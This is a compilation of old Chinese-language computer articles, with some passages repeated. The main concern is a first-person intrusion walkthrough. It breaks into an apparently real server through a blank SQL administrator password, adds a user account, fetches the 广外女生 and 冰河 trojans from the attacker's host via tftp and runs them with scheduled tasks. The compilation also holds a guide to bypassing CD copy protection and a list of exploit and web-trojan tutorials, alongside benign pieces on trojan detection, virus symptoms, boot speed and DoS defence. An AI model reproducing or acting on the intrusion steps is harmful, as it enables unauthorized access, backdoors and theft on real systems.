(以上每项之间均为或的关系)
2.不知道谁写的 [破解加密光盘五式] (在这里对作者致以十二万分的歉意)
如今市面上有很多加密光盘，这些光盘是以特殊形式刻录的。将它放入光驱后，就会出现一个软件的安装画面要你输入序列号，如果序列号正确就会出现一个文件浏览窗口，错误则跳回桌面。如果你是从资源浏览器中观看光盘文件就是一些图片之类的文件，你想找的文件却怎么也看不到。这样的事情你碰到过吧？如果你的光盘序列号丢了或者光盘上的序列号根本不对，那该怎么办呢？别急，看我的“神龙五式”！

第一式：用ultraedit等16进制编辑器直接找到序列号。

    运行ultraedit，用它打开光盘根目录下的setup.exe，然后点击菜单上的“搜索”－>“查找”，在弹出的对话框“查找什么”栏中填入“请输入序列号”，注意要将多选框“查找ascii字符”勾选上，回车，在找到的“请输入序列号”后面，接下去的数字就是序列号了。这一式直取中宫(序列号)，厉害！

第二式：用isobuster等光盘刻录软件直接去浏览光盘上的隐藏文件。

    运行isobuster，选择加密盘所在的光驱，点击选择栏旁边的刷新按钮，此时它就会读取光驱中的文件，这时你就会发现在左边的文件浏览框中多出一个文件夹，那里面就是你真正想要的文件。这时你就可以运行或复制这些文件了。这一式一目了然，清楚！

第三式：要用到虚拟光驱软件(如vcdrom，虚拟光驱2000)和16进制编辑器(如ultraedit，winhex)。

    方法是：

    1. 用虚拟光驱软件把加密光盘做成虚拟光碟文件，进度到1%的时候就可以按ctrl+alt+del组合键强行终止虚拟光驱程序的运行。

    2. 用16进制编辑器打开只做了%1的光碟文件(后缀名为vcd或fcd的文件)，在编辑窗口中上下查找任意看得见的目录名或文件名(由于文件不大很容易找到的)，在该位置的上下就可以看见隐含的目录名或文件名了(一般是目录名)。

    3. 在ms-dos窗口下用cd命令进入看到的那个目录，再dir一下就可以看见你想要的了，此时是运行还是复制文件就随你了。这一式左右互搏，再厉害的加密盘也在所难逃。

第四式：在光驱所在盘符下执行：

    d r2\\filelist.exe即可运行浏览程序(filelist.exe为隐藏的浏览光盘的程序)。

    用这种方法对付好多光盘都有效，但我不敢说100%有效，为什么？因为我不可能把所有的光盘都试过呀！这一式不需注册码，不需要软件，时尚之选！

第五式：利用file monitor对付隐藏目录的加密光盘。

    file monitor这个软件大家可能不是很熟悉，它是纯“绿色”免费 软件，可监视系统中指定文件运行状况，如指定文件打开了哪个文件，关闭了哪个文件，对哪个文件进行了数据读取等。通过它，你指定监控的文件有任何读、写、打开其它文件的操作都能被它监视下来，并提供完整的报告信息。哈哈，聪明的你肯定想到了吧？对！就是用它的这个功能来监视加密光盘中的文件运行情况，从而得到我们想要的东西。

    下面以某新版ddr跳舞碟为例，来看看如何发现隐藏目录。

    1. 运行file monitor的主文件filemon，在“options”内将“capture events”打上勾；

    2. 运行ddr跳舞碟，当选择的舞曲已调入内存后即可以退出ddr；

    3. 回到filemon，看到什么了？对！所有的文件调用均被记录下来啦！现在再将“capture events”前面的勾去掉，免得它仍旧不断的增加记录，然后来看看记录的都是什么。以下是截取的部分内容：

explorer findopen e:\\ddr99.exe success
explorer findclose e:\\ddr99.exe success
………… ……… …………………
………… ……… …………………
ddr99 findopen e:\\bgm\\s.wav nomore
ddr99 findopen e:\\bgm\\s.wav nomore
………… ……… …………………
………… ……… …………………
ddr99 open e:\\bgm\\track_01.wav success
ddr99 seek e:\\bgm\\track_01.wav success

    一切显而易见了，原来新版的ddr 跳舞碟其加密子目录为“bgm”！好啦，可以将喜欢的曲目拷贝下来后去退碟了。这一式天罗地网，让隐藏目录无处藏身！
有零工作室　www.you0.com www.you0.net联系QQ 3149886


简单入侵

《一键清理系统垃圾》

简单入侵

看看这主机是否是网站先，用IE打开它的IP：61。170。168。168，出现“该页无法显示”。看来这主
机还没WEB网页。祭起我的“X-SCAN”宝刀，全面扫描一下它的各种漏洞，我就不信他没有漏洞！
（玩黑必备一：眼睛长到头顶上）
X-SCAN扫描结果报告：
“端口开放：1433、3389
ASP 漏洞：don't find CGI漏洞： don't find IIS漏洞don't find……，SQL：SA /NULL”
呵呵，大局已定，大家看到了有哪些漏洞吗？什么，你不懂鸟语？哇噻，你先去补习鸟语再到我这来！
对了，我们的白灵、流二位大虾精通由各种乱码加鸟语组成的火星ASP语言，听说二位不日将移民火星，
你趁他们还在地球快去拜师学艺啊！
再接着卖我的黄婆烂瓜……
3389——我得最爱！利用远程主机打开的远程控制功能（通过3389连接）进入它的WINDOWS图形界面，
这种感觉对我等菜鸟来说可不是DOS破界面能比的哦~~
废话少说，打开我的“WINDOW2000远程客户程序”，填IP、点“联接”~~啊？连不上！再连~~还是不行
！55555……输入法漏洞是玩不成了。
一招不行再换一招！点根烟先……打开“天行网络”所制的精品软件——SQLEXEC，填上IP，用户名：
SA，密码为空，点“连接”---“：（连接成功！”
进来了，谈笑间我就进来了，我真厉害~~（玩黑必备二：自夸不怕吓死人）。先看看它的C盘的文件：
DIR C：，OK！这机子装的是WINNT，怪不得我用WIN2000的远程客户程序连不上，可是它怎么会打开
WIN2000的远程连接用端口-3389端口呢？
算了，越想越乱，忙我的正事吧。
为安全起见，让我看看它建立了哪些连接进程：“netstat -n”……哈，反馈回来的信息都是一些
196开头的IP，没开TTY监听，这该不会是个局域网的服务器吧？
再来看看我现在的权限有多少：“net user aaa 1234 /add”－－－“成功建立新用户”。呵呵，
权限还不小，能建新用户哦~~由于我机子用的是WIN98，所以没法用这新建的用户名为AAA，密码
为1234的帐户进行连接，这帐户对我来说根本
没用……
现在，我们即将开始取得远程主机的最最最……大权限！啥？你不信？呵呵，说你菜你还不高兴，
听说过木马吗？听说过大名鼎鼎专玩木马的“符号”大虾吗？哦，你不知木马只知符大虾……行，
赶明儿我让符大虾在你机子里也放个木马，这样你就
能深刻理解啥叫木马了~~
继续攻击……我们现在就要上传个木马到远程主机。木马“广外女生”现在国内很流行，前几天也
曾去黑网下栽了一个，它的被控端程序才90K，上传比较容易，就用它做远程主机的“后门”吧。1。
打开TFTP（一个能把你的PC变成FTP服务器的小程序）——
2。把“广外女生”的被控端程序gw.exe复制到我的C盘TFTP默认文件路径下。3。在远程主机里输入
命令："tftp -i xx.xx.xx.xx get gw.exe c:\gw.exe"
5分钟后，GW。EXE已乖乖在躺在远程主机的C盘里了~~~
现在，得想法子运行GW。EXE：1。打入命令"net time"---远程主机反馈当前时间"09:35"。 2.打入
程序起动时间命令"at 09:37 c:\gw.exe"（GW在9：37运行）——出现主机反应：“建立一个新任务，
ID=1”
OK！二分钟后将运行我的“广外女生”了！
打开我的“广外”控制端程序，在主机查找栏里填上“61.170.168.160---61.171.168.170”，点
“查找”。扫描很慢……别急……扫完了……啊？！在这扫描的IP端里无中“奖”主机！怪事啊！
是远程主机的“广外”没有运行还是我对这控制端程序的操
作错误？一定是这破“广外”本身程序不行，太烂了~~（玩黑必备三：一切都不是我的错！）。
看来，今天我只得请出封存已久的国货精品木马——“冰河”了。我的“冰河2。2”的被控端有200
多K，估计上传时间会很久，但如果上传成功，它的功能可不是“广外”所能与之并论的啊！另外，
对冰河的界面操作也不会似“广外”那嚒陌生……
言归正传，现在开始上传“冰河”：“tftp -i xx.xx.xx.xx get G-server.exe c:\inetpub\GG.exe"
（为不至于太过醒目，这次把文件传到C盘的INETPUB文件包下）
缓慢上传中……让我再点根烟，趁这功夫去“黑白网络”的技术论坛逛逛去……
已过25分钟了，进远程主机瞧瞧是否已下栽成功了~~OK！冰河已在那里了。接着：“net time”，
反馈信息：10:30”。“at 10:32 c:\inetpub\GG.exe”，反馈信息“运行新任务，ID=1”
二分钟后，打开“冰河”控制端，加入远程主机IP，连接……成功！接着再：添加服务器端连接密码、
添加冰河运行自动通知发往信箱、删除“广外”、“冰河”被控端程序。
……
现在，这主机的一切已尽在我眼前了，真爽啊！明天，我也许会把一个SOCK5代理的服务器端程序放进
这主机，大家以后要是想用SOCK5代理，又懒得去漫无目标的查找的话，请找我，我会把我这个人专用
“肉机”贡献出来的。


看看黑客是否光顾过你的电脑

《一键清理系统垃圾》

看看黑客是否光顾过你的电脑

--------------------------------------------------------------------------------

计算机有时死机，有时又重新启动；在没有执行什么操作的时候，却在拼命读写硬盘；系统莫明其妙地对软驱进行搜索；没有运行大的程序，而系统的速度越来越慢，用右键打开【我的电脑】，查看【属性】→【性能】中的【系统资源】正常时一般都在90％以上；用CTRL＋ALT＋DEL调出任务表，发现有多个名字相同的程序在运行，而且可能会随时间的增加而增多。特别是在连入Internet网或是局域网后，如果你的机器有这些现象，就应小心了，当然也有可能是一些其它的病毒在作怪。

在清除这些病毒的时候最好用最新的“杀虫剂”以防年久失效。如你手中没有杀毒软件，但是又确有不对劲的地方，是否病毒，还需要你的经验来断定！以下是几个经验：

1. 查看c:\autoexec.bat与c:\config.sys，这两个文件里有一些系统所需的驱动程序。看看有无加入什么奇特的驱动程序，如有怀疑的对象就在他的前面加上“REM”，恢复时将“REM”去掉就可以了。

2. 再看看Windows目录下的WIN.INI文件中开头的几行：

[WINDOWS]

load=

ren=

这里放的是启动Windows后自动执行的程序，如中文之星就在这里。黑客病毒note.exe就可能在这儿，如有怀疑的对象就在它前面加上“；”，恢复时将“；”去掉就可以了。

3. 查看Windows目录下的SYSTEM.INI文件中的这几行：

[386Enh]

device=

这里一般是放置系统本身和外加的驱动程序。外加的驱动程序一般都用全路径，

如：

device=c:\abcd\1234.386

同样如有怀疑的对象就在前面加上“；”，恢复时将“；”去掉。

4. 查看开始菜单中的【程序】→【启动】。

这里放的也是启动Windows后自动执行的程序，如有怀疑的对象就在

C:\Windows\Start Menu\Programs\启动中将它删除，恢复时从“回收站”恢复。

5. 在Windows中，查看注册表。在【开始】→【运行】中执行“regedit”。

在修改以前请一定先做好备份。在注册表中看看。

\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\

CurrentVersion\RunServices和Run中执行了什么，

有名的“back orifice”病毒就在这里。

6. Windows中的执行文件.exe、.com、.dll、.386 ……它们都有可能是黑客病毒或携带者。在系统正常的时候，最好对以上文件做一个备份，有备无患嘛！

7. 在Windows目录下，看看有无一个名为Winstart.bat的文件。这个文件也是与Autoexec.bat类似的一个自动批处理文件，不过它只能为Windows工作而不能用于DOS下使用。仔细看看其中有无什么你不知道的驱动程序。一般这个自动批处理文件是不会被用到的。如你也怀疑它可以先备份一份，

然后将它删除，再重新启动计算机。


快马加鞭20秒进入Windows XP操作系统

《一键清理系统垃圾》

快马加鞭20秒进入Windows XP操作系统

   电脑中CPU的处理速度在摩尔定律这根魔棒的指挥下突飞猛进，然而我们发现电脑的启动速度却未有进步，从按开机按钮到WinXP任务栏右边的图标全部显示出来，一般要40秒以上。这与电视机一按开关就能听到声音、看到图像相比，真是相形见绌。

    一、影响启动速度的硬件因素

    笔者通过实践，发现影响电脑启动速度的主要配件是主板和硬盘，而与CPU关系不大。也就是说在其他条件相同的情况下，价格昂贵的奔腾4电脑与廉价的赛扬4的启动速度是一样的。

    主板是各种电脑配件的“基地”，在开机时要做的工作很多，比如自检、搜索各种端口、各种外接设备。因此减少自检时间、减少外接设备、提高效率才能提高启动速度。如果电脑连接了扫描仪、USB硬盘等外设，就可能降低系统的启动速度。建议大家在需要用到这些外设时才连接上，USB设备可以在启动后连接。

    网卡若设置不当，会明显减缓系统启动速度。如果你的电脑用不着网卡，那就直接将PCI网卡拔掉，集成网卡可以通过BIOS屏蔽掉，以免影响启动速度。很多主板对集成网卡的检测远快于独立网卡，这也是一些电脑启动后“假死”，过了一分多钟才能正常上网的原因之一。

    决定主板性能的主要因素是主板芯片组，决定启动速度的主要因素是主板芯片组的磁盘性能及驱动程序性能。目前主板芯片组的主要品牌有Intel、SiS、VIA、ATi、nVIDIA五个厂商，磁盘性能最好的是Intel与SiS。Intel是IT巨头，IT界无人不晓，它占据了主板芯片组60%以上的市场份额。而SiS知名度较低，主板芯片组的市场份额不足10%，这可能与宣传不够有关，然而在AMD平台，它的磁盘性能却是最好的，价格也是最便宜的。
    为了减少开机自检时间，某些主板厂商会做一些特殊设计，最大能使BIOS自检时间缩短至5秒。我们可以按自己的需要选择不同的主板厂商，而不是一味地听从经销商的推荐。

    除了开机自检外，电脑启动的时间主要用在从硬盘读取系统文件。硬盘的工作是通过移动磁头读写高速旋转的盘片上的数据。那么盘片转速越高，单位时间内磁头读到的数据就会越多，对系统启动非常有利。另外，寻道时间快、缓存大的硬盘也能明显提升启动时间。资金充裕的购机者或DIY们可以考虑西数的“猛禽”系列硬盘，资金紧张或普通用户可选择经常获性能奖的日立大缓存硬盘。

    电脑是“软硬兼施”的高科技产品，配件设置与系统优化也是启动提速不可缺少的武器。

    二、配件的设置与优化

    1．主板的BIOS优化设置

    关闭多余的IDE通道、USB设备等硬件，可用“None”屏蔽掉。用“IDE HDD AUTO DETECTION”自动检测硬盘。不进行内存检测，把各项cache打开，进入“Advanced CMOS Setup”，将“Quick Boot”设为“Enable”，可不检测1MB以上的内存。

    “IDE 0 Master/Slave PIO/DMA Mode,IDE 1 Master/Slave PIO/DMA Mode”硬盘顺序（模式）全部设为“Auto”。

    进入“Advanced BIOS Features”选项，将光标移到“First Boot Device”选项，选“HDD-0”直接从硬盘启动，这样启动就快上好几秒。将光标移到“Quick Power On Self Test”（快速开机自检）设为“Enabled”。对于“Boot UP Floppy Seek”（开机自检软驱）设为“Disabled”。对于内存品质好的内存条建议在“SDRAM CAS Latency”选项中设置为“2”。

    小提示：对于一项效果相同的设置，在不同的主板BIOS中其英文名称可能不一样。

    2。网卡设置

    在进入操作系统时，系统会进行网卡IP地址的搜索。如果网卡的IP地址设置为自动获取，则系统会在网络中搜索DHCP服务器以获得IP地址，无形中就会延长启动时间。若不是必要的情况，最好将网卡的IP地址进行指定(尤其是局域网中的客户。

    3．开启硬盘的DMA传输方式

    在桌面右击“我的电脑→属性→硬件→设备管理器→IDE ATA/ATAPI控制器→找到硬盘所在的IDE通道→属性→高级设置”，打开硬盘DMA的传送方式以加快数据读写速度。Win98与WinME的设置基本相同，只需在DMA选项前打钩。

    4．给BIOS ROM瘦身

    主板BIOS ROM中有一些文件是我们用不上的，可以用CBROM、AwardFlash等BIOS编辑工具去除。注意：这是有一定危险的操作，菜鸟还是不动为好。

    三、Windows系统优化

    1．去除多余的自启动程序

    这是见效很明显的方法。点击“开始”→“运行”，在出现的对话框中输入“msconfig”，然后点击“确定”，就会调出“系统配置实用程序”（只限于Win98和WinXP系统，Win2000用户需要拷贝MSCONFIG.EXE到系统文件夹下使用或使用后文讲述的注册表编辑方法）。

    点击其中的“启动”标签，将不需要自动启动的程序前面的“√”去掉就可以了。一般只需留下ctfmon(输入法图标)、systemtray(音量图标)以及杀毒程序。笔者的电脑只留下“ctfmon”这一项，如此可将启动时间缩短10秒左右。

    2．优化组件的系统属性(Win98/WinME)

    右击“我的电脑”，选择“属性→性能→文件系统”，选择“软盘”，去掉“每次启动电脑时搜索新的软盘驱动器”；选择“硬盘”，将“主要用途”改为“网络服务器”，“预读式优化”调至全速；选择“CD-ROM”，缓存调至最大，选“四倍或更高速”。

    3．修改IDE通道控制（WinXP）

    右击我的电脑→属性→硬件→设备管理器→展开“IDE ATA/ATAP控制器”，双击“次要IDE通道”选项，在弹出的对话框中选择“高级设置”选项卡，在“设备0”与“设备1”中的“设备类型”中，将原来的“自动检测”改为“无”（图6），“确定”后退出。“主要IDE通道”的修改方法也相同。重启后，滚动条滚动的时间会明显减少。

    4．使用BootVis软件提升启动速度

    BootVis（下载地址：www.skycn.com/soft/7766.html）是微软公司专为WinXP开发的启动加速软件，使用比较安全，能明显提高启动速度。因篇幅关系，这里就不介绍具体使用方法了，有兴趣的朋友可查看其帮助文件。

    5．去除华丽臃肿的外观

    去掉“墙纸”、“屏幕保护”，删除多余的桌面图标。如果是WinXP，还可右击“我的电脑”，选择“属性→高级”，在“性能”项目单击“设置”，选中“调整为最佳性能”。

    主流配置的电脑在经过以上设置与优化后，一般情况下WinXP的开机启动时间就可以控制在20秒左右了。


零基础53个黑客在线教程

《一键清理系统垃圾》

零基础53个黑客在线教程

下面的网址是语音模式的教学
希望大家喜欢

01 ping命令的使用http://images.enet.com.cn/eschool/wmv/ping.wmv
02 netstat命令的使用 http://images.enet.com.cn/eschool/wmv/netstat.wmv
03 tasklist和taskkill的使用 http://images.enet.com.cn/eschool/wmv/tasklist.wmv
04 扫描器X-SCAN的使用(上) http://images.enet.com.cn/eschool/wmv/x-scan1.wmv
05 扫描器X-SCAN的使用(下) http://images.enet.com.cn/eschool/wmv/x-scan2.wmv
06 先试手:Ipc漏洞 http://images.enet.com.cn/eschool/wmv/ipc.wmv
07 shed共享扫描器的使用 http://images.enet.com.cn/eschool/wmv/shed.wmv
08 superscan3扫描器的使用 http://images.enet.com.cn/eschool/wmv/superscan3.wmv
09 流光扫描器的应用 http://images.enet.com.cn/eschool/wmv/liuguan.wmv
10 win2000自动攻击器的使用 http://images.enet.com.cn/eschool/wmv/win2000.wmv
11 俄罗斯扫描器SSS简单使用 http://images.enet.com.cn/eschool/wmv/sss.wmv
12 dameware远程管理工具的使用 http://images.enet.com.cn/eschool/wmv/dameware.wmv
13 找回ADSL拨号的密码.http://images.enet.com.cn/eschool/wmv/adsl.wmv
14 缓冲区及溢出的道理视频教程 http://images.enet.com.cn/eschool/wmv/01.wmv
15 溢出例子和分析视频教程 http://images.enet.com.cn/eschool/wmv/02.wmv
16 Shellcode介绍视频教程 http://images.enet.com.cn/eschool/wmv/03.wmv
17 缓冲区溢出简单利用视频教程 http://images.enet.com.cn/eschool/wmv/04.wmv
18 构造利用视频教程 http://images.enet.com.cn/eschool/wmv/05.wmv
19 FOXMAIL漏洞编写-漏洞公告 http://images.enet.com.cn/eschool/wmv/06-1.wmv
20 FOXMAIL漏洞编写-溢出定位 http://images.enet.com.cn/eschool/wmv/06-2.wmv
21 FOXMAIL漏洞-shellcode编写 http://images.enet.com.cn/eschool/wmv/06-3.wmv
22 IIS.printer利用程序 http://images.enet.com.cn/eschool/wmv/07.wmv
23 JMPCALL EBX溢出利用方式 http://images.enet.com.cn/eschool/wmv/08s1.wmv
24 JMP ESP改写 JMP EBX课程 http://images.enet.com.cn/eschool/wmv/09tr.wmv
25 IDQ-IDA漏洞利用程序编写 http://images.enet.com.cn/eschool/wmv/010.wmv.wmv
26 ShellCode的基本概念 http://images.enet.com.cn/eschool/wmv/0011.wmv
27 打开CMD的方法-1 http://images.enet.com.cn/eschool/wmv/12-1.wmv
28 打开CMD的方法-2 http://images.enet.com.cn/eschool/wmv/12-2.wmv
29 打开CMD的方法-3 http://images.enet.com.cn/eschool/wmv/12-3.wmv
30 打开CMD的方法-4 http://images.enet.com.cn/eschool/wmv/12-4.wmv
31 shellcode通用性初步探讨 http://images.enet.com.cn/eschool/wmv/0013.wmv
32 Windows对话框的编写-1 http://images.enet.com.cn/eschool/wmv/014-1.wmv
33 Windows对话框的编写-2 http://images.enet.com.cn/eschool/wmv/0014-2.wmv
34 给系统添加用户-1 http://images.enet.com.cn/eschool/wmv/015-1.wmv
35 给系统添加用户-2 http://images.enet.com.cn/eschool/wmv/00015-2.wmv
36 黑客工具NC的使用教程 http://images.enet.com.cn/eschool/wmv/nc.wmv
37 智能ABC和guest帐号问题 http://images.enet.com.cn/eschool/wmv/abc.wmv
38 MS05039漏洞利用教程 http://wmv/nc.wmv
39 Iris分析TCP_IP协议谈-001 http://images.enet.com.cn/eschool/wmv/Iris1.wmv
40 Iris分析TCP_IP协议谈-002 http://images.enet.com.cn/eschool/wmv/Iris2.wmv
41 Iris分析TCP_IP协议谈-003 http://images.enet.com.cn/eschool/wmv/Iris3.wmv
42 在系统中建立隐藏帐号 http://images.enet.com.cn/eschool/wmv/hideuser.wmv
43 autorun介绍与利用 http://images.enet.com.cn/eschool/wmv/autorun.wmv
44 iis的安全配置介绍 http://images.enet.com.cn/eschool/wmv/iis.wmv
45 realplay网页木马的制作方法 http://images.enet.com.cn/eschool/wmv/realplay.wmv
46 radmin远程管理的配置 http://images.enet.com.cn/eschool/wmv/radmin.wmv
47 Virtual PC虚拟机的使用 http://images.enet.com.cn/eschool/wmv/virtualpc.wmv
48 pstools工具包简单使用 http://images.enet.com.cn/eschool/wmv/pstools.wmv
49 telnet和ntlm认证问题 http://images.enet.com.cn/eschool/wmv/telnet.wmv
50 堆栈和堆缓冲区溢出比较-001 http://images.enet.com.cn/eschool/wmv/dui001.wmv
51 堆栈和堆缓冲区溢出比较-002 http://images.enet.com.cn/eschool/wmv/dui002.wmv
52 堆栈和堆缓冲区溢出-003 http://images.enet.com.cn/eschool/wmv/dui003.wmv
53 堆栈和堆缓冲区溢出比较-004 http://images.enet.com.cn/eschool/wmv/dui004.wmv


判断电脑是否感染了病毒

《一键清理系统垃圾》

判断电脑是否感染了病毒

    我的电脑经常出现死机、运行速度慢等异常情况，使用了多种杀毒软件也不见效，如何判断电脑异常是否是病毒在作怪？

    这样的例子并不少见，特别是对于一些初级电脑用户。下面我就结合个人电脑使用及企业网络维护方面的防毒经验从以下几个方面给大家介绍介绍如何判断是否中了病毒，希望对帮助识别"真毒"有一定帮助！

    病毒与软、硬件故障的区别和联系

    电脑出故障不只是因为感染病毒才会有的，个人电脑使用过程中出现各种故障现象多是因为电脑本身的软、硬件故障引起的，网络上的多是由于权限设置所致。我们只有充分地了解两者的区别与联系，才能作出正确的判断，在真正病毒来了之时才会及时发现。下面我就简要列出了分别因病毒和软、硬件故障引起的一些常见电脑故障症状分析。

    症状、被入侵的可能性 软、硬件故障的可能性

    经常死机：病毒打开了许多文件或占用了大量内存；不稳定（如内存质量差，硬件超频性能差等）；运行了大容量的软件占用了大量的内存和磁盘空间；使用了一些测试软件（有许多BUG）；硬盘空间不够等等；运行网络上的软件时经常死机也许是由于网络速度太慢，所运行的程序太大，或者自己的工作站硬件配置太低。

    系统无法启动：病毒修改了硬盘的引导信息，或删除了某些启动文件。如引导型病毒引导文件损坏；硬盘损坏或参数设置不正确；系统文件人为地误删除等。
    文件打不开：病毒修改了文件格式；病毒修改了文件链接位置。文件损坏；硬盘损坏；文件快捷方式对应的链接位置发生了变化；原来编辑文件的软件删除了；如果是在局域网中多表现为服务器中文件存放位置发生了变化，而工作站没有及时涮新服器的内容（长时间打开了资源管理器）。

    经常报告内存不够：病毒非法占用了大量内存；打开了大量的软件；运行了需内存资源的软件；系统配置不正确；内存本就不够（目前基本内存要求为128M）等。

    提示硬盘空间不够：病毒复制了大量的病毒文件（这个遇到过好几例，有时好端端的近10G硬盘安装了一个WIN98或WINNT4.0系统就说没空间了，一安装软件就提示硬盘空间不够。硬盘每个分区容量太小；安装了大量的大容量软件；所有软件都集中安装在一个分区之中；硬盘本身就小；如果是在局域网中系统管理员为每个用户设置了工作站用户的"私人盘"使用空间限制，因查看的是整个网络盘的大小，其实"私人盘"上容量已用完了。

    软盘等设备未访问时出读写信号：病毒感染；软盘取走了还在打开曾经在软盘中打开过的文件。

    出现大量来历不明的文件：病毒复制文件；可能是一些软件安装中产生的临时文件；也或许是一些软件的配置信息及运行记录。

    启动黑屏：病毒感染（记得最深的是98年的4.26，我为CIH付出了好几千元的代价，那天我第一次开机到了Windows画面就死机了，第二次再开机就什么也没有了）；显示器故障；显示卡故障；主板故障；超频过度；CPU损坏等等

    数据丢失：病毒删除了文件；硬盘扇区损坏；因恢复文件而覆盖原文件；如果是在网络上的文件，也可能是由于其它用户误删除了。


破解加密光盘五式

《一键清理系统垃圾》

破解加密光盘五式

  如今市面上有很多加密光盘，这些光盘是以特殊形式刻录的。将它放入光驱后，就会出现一个软件的安装画面要你输入序列号，如果序列号正确就会出现一个文件浏览窗口，错误则跳回桌面。如果你是从资源浏览器中观看光盘文件就是一些图片之类的文件，你想找的文件却怎么也看不到。这样的事情你碰到过吧？如果你的光盘序列号丢了或者光盘上的序列号根本不对，那该怎么办呢？别急，看我的“神龙五式”！

>第一式：用UltraEdit等16进制编辑器直接找到序列号
    运行UltraEdit，用它打开光盘根目录下的SETUP.EXE，然后点击菜单上的“搜索”－>“查找”，在弹出的对话框“查找什么”栏中填入“请输入序列号”，注意要将多选框“查找ASCII字符”勾选上，回车，在找到的“请输入序列号”后面，接下去的数字就是序列号了。这一式直取中宫(序列号)，厉害！

    第二式：用IsoBuster等光盘刻录软件直接去浏览光盘上的隐藏文件

    运行IsoBuster，选择加密盘所在的光驱，点击选择栏旁边的刷新按钮，此时它就会读取光驱中的文件，这时你就会发现在左边的文件浏览框中多出一个文件夹，那里面就是你真正想要的文件。这时你就可以运行或复制这些文件了。这一式一目了然，清楚！

    第三式：要用到虚拟光驱软件(如Vcdrom，虚拟光驱2000)和16进制编辑器(如UltraEdit，WinHex)

    方法是：

    1. 用虚拟光驱软件把加密光盘做成虚拟光碟文件，进度到1%的时候就可以按Ctrl+Alt+Del组合键强行终止虚拟光驱程序的运行。

    2. 用16进制编辑器打开只做了%1的光碟文件(后缀名为vcd或fcd的文件)，在编辑窗口中上下查找任意看得见的目录名或文件名(由于文件不大很容易找到的)，在该位置的上下就可以看见隐含的目录名或文件名了(一般是目录名)。

    3. 在MS-DOS窗口下用CD命令进入看到的那个目录，再Dir一下就可以看见你想要的了，此时是运行还是复制文件就随你了。这一式左右互搏，再厉害的加密盘也在所难逃。

    第四式：在光驱所在盘符下执行：

    d r2filelist.exe即可运行浏览程序(filelist.exe为隐藏的浏览光盘的程序)。

    用这种方法对付好多光盘都有效，但我不敢说100%有效，为什么？因为我不可能把所有的光盘都试过呀！这一式不需注册码，不需要软件，时尚之选！

    第五式：利用File Monitor对付隐藏目录的加密光盘

    File Monitor这个软件大家可能不是很熟悉，它是纯“绿色”免费 软件，可监视系统中指定文件运行状况，如指定文件打开了哪个文件，关闭了哪个文件，对哪个文件进行了数据读取等。通过它，你指定监控的文件有任何读、写、打开其它文件的操作都能被它监视下来，并提供完整的报告信息。哈哈，聪明的你肯定想到了吧？对！就是用它的这个功能来监视加密光盘中的文件运行情况，从而得到我们想要的东西。

    下面以某新版DDR跳舞碟为例，来看看如何发现隐藏目录。

    1. 运行File Monitor的主文件FileMon，在“Options”内将“Capture Events”打上勾；

    2. 运行DDR跳舞碟，当选择的舞曲已调入内存后即可以退出DDR；

    3. 回到FileMon，看到什么了？对！所有的文件调用均被记录下来啦！现在再将“Capture Events”前面的勾去掉，免得它仍旧不断的增加记录，然后来看看记录的都是什么。以下是截取的部分内容：

    Explorer FindOpen E:DDR99.EXE SUCCESS

    Explorer FindClose E:DDR99.EXE SUCCESS

    ………… ……… …………………

    ………… ……… …………………

    Ddr99 FindOpen E:BGMS.WAV NOMORE

    Ddr99 FindOpen E:BGMS.WAV NOMORE

    ………… ……… …………………

    ………… ……… …………………

    Ddr99 Open E:BGMTRACK_01.WAV SUCCESS

    Ddr99 Seek E:BGMTRACK_01.WAV SUCCESS

    一切显而易见了，原来新版的DDR 跳舞碟其加密子目录为“BGM”！好啦，可以将喜欢的曲目拷贝下来后去退碟了。这一式天罗地网，让隐藏目录无处藏身！


浅析中小网站如何对付 DoS(拒绝服务)攻击

《一键清理系统垃圾》

浅析中小网站如何对付 DoS(拒绝服务)攻击

    DoS（Denial of Service）是一种利用合理的服务请求占用过多的服务资源，从而使合法用户无法得到服务响应的网络攻击行为。

    被DoS攻击时的现象大致有：

    * 被攻击主机上有大量等待的TCP连接；

    * 被攻击主机的系统资源被大量占用，造成系统停顿；

    * 网络中充斥着大量的无用的数据包，源地址为假地址；

    * 高流量无用数据使得网络拥塞，受害主机无法正常与外界通讯；

    * 利用受害主机提供的服务或传输协议上的缺陷，反复高速地发出特定的服务请求，使受害主机无法及时处理所有正常请求；

    * 严重时会造成系统死机。

    到目前为止，防范DoS特别是DDoS攻击仍比较困难，但仍然可以采取一些措施以降低其产生的危害。对于中小型网站来说，可以从以下几个方面进行防范：

    主机设置：

    即加固操作系统，对各种操作系统参数进行设置以加强系统的稳固性。重新编译或设置Linux以及各种BSD系统、Solaris和Windows等操作系统内核中的某些参数，可在一定程度上提高系统的抗攻击能力。

    例如，对于DoS攻击的典型种类—SYN Flood，它利用TCP/IP协议漏洞发送大量伪造的TCP连接请求，以造成网络无法连接用户服务或使操作系统瘫痪。该攻击过程涉及到系统的一些参数：可等待的数据包的链接数和超时等待数据包的时间长度。因此，可进行如下设置：

    * 关闭不必要的服务；

    * 将数据包的连接数从缺省值128或512修改为2048或更大，以加长每次处理数据包队列的长度，以缓解和消化更多数据包的连接；

    * 将连接超时时间设置得较短，以保证正常数据包的连接，屏蔽非法攻击包；

    * 及时更新系统、安装补丁。

    防火墙设置：

    仍以SYN Flood为例，可在防火墙上进行如下设置：

    * 禁止对主机非开放服务的访问；

    * 限制同时打开的数据包最大连接数；

    * 限制特定IP地址的访问；

    * 启用防火墙的防DDoS的属性；

    * 严格限制对外开放的服务器的向外访问，以防止自己的服务器被当做工具攻击他人。

    此外，还可以采取如下方法：

    * Random Drop算法。当流量达到一定的阀值时，按照算法规则丢弃后续报文，以保持主机的处理能力。其不足是会误丢正常的数据包，特别是在大流量数据包的攻击下，正常数据包犹如九牛一毛，容易随非法数据包被拒之网外；

    * SYN Cookie算法，采用6次握手技术以降低受攻击率。其不足是依据列表查询，当数据流量增大时，列表急剧膨胀，计算量随之提升，容易造成响应延迟乃至系统瘫痪。

    由于DoS攻击种类较多，而防火墙只能抵挡有限的几种。

    路由器设置：

    以Cisco路由器为例，可采取如下方法：

    * Cisco Express Forwarding（CEF）；

    * 使用Unicast reverse-path；

    * 访问控制列表（ACL）过滤；

    * 设置数据包流量速率；

    * 升级版本过低的IOS；

    * 为路由器建立log server。

    其中，使用CEF和Unicast设置时要特别注意，使用不当会造成路由器工作效率严重下降。升级IOS也应谨慎。

